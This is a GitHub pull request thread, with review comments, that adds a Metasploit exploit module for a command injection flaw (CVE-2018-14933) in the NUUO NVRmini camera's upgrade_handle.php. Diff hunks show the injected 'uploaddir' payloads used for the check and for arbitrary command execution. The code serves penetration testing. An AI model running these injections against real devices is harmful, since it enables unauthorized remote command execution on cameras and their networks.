### PR TITLE
Add nuuo_nvrmini_upgrade_rce.rb

### PR DESCRIPTION
**Pull request by 0x45dd**
This module is best explained in the following link:
https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html

Tenable also has a write-up for this:
https://www.tenable.com/security/research/tra-2018-41

### CODE REVIEW

**Comment by berkdsnr** [comment]
https://pbs.twimg.com/media/DrLibrpWsAEHe4k.jpg:large

**Comment by berkdsnr** [comment]
Can you review  it again

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 1]
```diff
@@ -0,0 +1,77 @@
...
+          ['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
+          ['CVE', '2018-14933'],
+          ['EDB', '45070']
+        ],
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'       => %w{ unix win },
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]:
```suggestion
      'Platform'       => %w{ unix win linux },
```

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 2]
```diff
@@ -0,0 +1,77 @@
...
+  def check
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
+      'vars_get'        =>
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
+        }
+    })
+    if res.code == 200 and res.body =~ /upload_tmp_dir/
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: Check `res` before you use `res`.

```ruby
unless res
  vprint_error 'Connection failed'
  return CheckCode::Unknown
end
```

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 3]
```diff
@@ -0,0 +1,77 @@
...
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def http_send_command(cmd)
+    uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
+    res = send_request_cgi({
+      'method'          => 'GET',
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: Why so much whitespace?

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 4]
```diff
@@ -0,0 +1,77 @@
...
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ ['NUUO NVRmini', { }], ],
+      'DisclosureDate' => 'Aug 04 2018',
+      'DefaultTarget'  => 0))
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: Why so much whitespace?

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 5]
```diff
@@ -0,0 +1,77 @@
...
+      'vars_get'        =>
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: Why so much whitespace?

**Comment by bcoles** [comment]
Please resolve `msftidy` errors.

```
$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb:20 - [WARNING] Spaces at EOL
```

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 2 above)
Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: Which line should I add?

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 1 above)
Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: unraveling

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 3 above)
Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: unraveling

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 5 above)
Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: unraveling

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 2 above)
Comment (bcoles) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: You should add these lines:


```ruby
unless res
  vprint_error 'Connection failed'
  return CheckCode::Unknown
end
```

Before:

```ruby
if res.code == 200 and res.body =~ /upload_tmp_dir/
```

Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: solved bro

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 4 above)
Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: solved

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 3 above)
Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: solved

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 5 above)
Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: solved

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 1 above)
Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: solved

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 6]
```diff
@@ -0,0 +1,75 @@
...
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
+      'vars_get' =>
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
+        }
+    })
+  unless res
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: Messed up indentation

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 7]
```diff
@@ -0,0 +1,75 @@
...
+    uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      =>  uri,
+      'vars_get' =>
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';"+cmd+";'"
+        }
+    })
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: What happened to the `end` at the end of this method?

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 8]
```diff
@@ -0,0 +1,76 @@
...
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'NUUO NVRmini - upgrade_handle.php Remote Command Execution',
+      'Description' => %q{
+        NUUO NVRmini  ip camera web application. The upgrade_handle.php file is affected by the remote command execution vulnerability.
+      },
+      'License' => MSF_LICENSE,
+      'Author'  =>
+        [
+          'Berk Dusunur <@berkdusunur>',
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: The whitespace at the end of line was making `msftidy` unhappy.

```suggestion
          'Berk Dusunur <@berkdusunur>',
```

```
$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb:20 - [WARNING] Spaces at EOL
```

Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: solved

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 2 above)
Comment (bcoles) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: Do this:

```ruby

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'),
      'vars_get' =>
        {
          'cmd' => 'writeuploaddir',
          'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
        }
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 200 and res.body =~ /upload_tmp_dir/
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  end
```

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 9]
```diff
@@ -0,0 +1,82 @@
...
+        },
+      'Platform'       => %w{ unix win linux },
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [ ['NUUO NVRmini', { }], ],
+      'DisclosureDate' => 'Aug 04 2018',
+      'DefaultTarget'  => 0))
+
+  end
+
+def check
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: Indentation

```suggestion
  def check
```

Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: solved solved solved please, enough 💃

Comment (bcoles) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: What are you using to edit the file? Every time you make a change, you mess up the indentation somewhere else.

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 10]
```diff
@@ -0,0 +1,82 @@
...
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';"+cmd+";'"
+        }
+    })
+    unless res
+      fail_with(Failure::Unknown, 'Failed to execute the command.')
+    end
+    res
+   end
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]:
```suggestion
  end
```

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 11]
```diff
@@ -0,0 +1,82 @@
...
+   def exploit
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]:
```suggestion
  def exploit
```

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 12]
```diff
@@ -0,0 +1,82 @@
...
+    http_send_command(payload.encoded)
+   end
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]:
```suggestion
  end
```

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb [hunk 13]
```diff
@@ -0,0 +1,82 @@
...
+ end
```
Comment (bcoles) [inline modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]:
```suggestion
end
```

**Review by bcoles — COMMENTED** [review]
indentation

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 9 above)
Comment (berkdsnr) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: Yes, yes, you're right, I made the final arrangement. it's over. When to add to rapid7.com?

File: modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb (hunk 10 above)
Comment (bcoles) [reply modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb]: No it isn't

indentation

**Comment by wchen-r7** [comment]
It looks like in order to test this module, the device is not cheap to buy? How did you test it? Do you think you can make a pcap for us that captures using the module to get a session? Within legal limits, of course. Thank you!

**Comment by berkdsnr** [comment]
With this vulnerability I have encountered during the penetration test. But I have a picture that I use the module with an external ip address

**Comment by wchen-r7** [comment]
@berkdsnr Is it possible to email that image to us? The email address is: `msfdev[at]metasploit.com`. You may mask out the IPs if you need to. Thank you.

**Comment by wchen-r7** [comment]
We have received that email and is currently being reviewed. You will hear back from us soon. Thank you!

**Comment by berkdsnr** [comment]
Sure, I will wait. Best King!

19 Ara 2018 Çar 09:51 tarihinde sinn3r <notifications@github.com> şunu
yazdı:

**Comment by wvu-r7** [comment]
https://www.tenable.com/security/research/tra-2018-41

**Comment by wchen-r7** [comment]
# Release Notes

This exploits a vulnerability in the web application of NUUO NVRmini IP camera, which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.

**Comment by berkdsnr** [comment]
Yes

7 Şub 2019 Per 07:32 tarihinde sinn3r <notifications@github.com> şunu yazdı:

**Pull request merged**